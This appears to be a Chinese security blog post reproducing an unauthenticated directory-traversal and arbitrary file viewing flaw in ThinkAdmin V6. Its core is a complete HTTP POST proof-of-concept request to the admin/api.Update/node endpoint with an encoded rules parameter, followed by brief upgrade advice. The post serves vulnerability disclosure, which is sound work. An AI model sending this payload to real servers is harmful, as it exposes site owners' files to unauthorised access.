Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现

渗透测试 Adminxe 2998℃ 0评论

0x00 简介

ThinkAdmin是基于 ThinkPHP 的微信后台管理平台

0x01 影响版本

ThinkAdminV6

0x02 漏洞复现

POC:

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D

目录遍历注意POST数据包rules参数值需要URL编码

0x03 修复建议

升级版本

转载请注明:Adminxe's Blog » ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现

喜欢 (8)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址